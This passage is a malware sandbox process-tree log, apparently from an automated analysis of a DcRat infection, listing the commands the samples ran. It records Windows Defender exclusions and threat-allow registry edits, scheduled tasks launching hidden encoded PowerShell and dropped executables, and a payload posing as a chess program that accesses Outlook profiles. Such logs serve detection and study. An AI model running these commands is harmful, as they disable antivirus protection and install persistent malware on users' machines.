                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:81192
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:81208
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:81232
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:81244
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:81256
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:81268
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:81280
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:81292
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:81304
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:81316
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:81328
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:81340
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "gfPUoMvGV" /SC once /ST 02:20:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • DcRat
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:81360
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /run /I /tn "gfPUoMvGV"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:81408
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "gfPUoMvGV"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:82440
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 03:01:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\ptjbjED.exe\" Av /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:82512
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /run /I /tn "HqggdVJZxuzvaULcA"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:82628
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1380 -ip 1380
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:79588
                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k AarSvcGroup -p -s AarSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:79764
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:79784
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • DcRat
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:80308
                                                                                                                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x454 0x3c8
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:80012
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1188 -ip 1188
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:80732
                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:81448
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:81928
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:81800
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:81780
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3F71.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3F71.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:82108
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:83188
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3F71.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3F71.exe
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:85764
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4241.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4241.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                              PID:82184
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LucasChess_02c.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LucasChess_02c.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                PID:82368
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:83196
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LucasChess_02c.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LucasChess_02c.exe
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                    • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                                                                    • outlook_office_path
                                                                                                                                                                                                                                                                                                    • outlook_win_path
                                                                                                                                                                                                                                                                                                    PID:85752
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:82200
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 82200 -s 868
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:82240
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 82200 -ip 82200
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:82216
                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:82300
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\eoLFqTN.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\eoLFqTN.exe d8 /site_id 525403 /S
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:82316
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                          PID:82500
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:82860
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:82896
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:82960
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:82988
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:83044
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:83056
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:83072
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:83144
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:83352
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:83408
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:83444
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:83480
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:83512
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:83524
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:83564
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:83632
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:83656
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:83672
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:83684
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:83700
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:83764
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:83776
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:83788
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:83828
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:83928
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
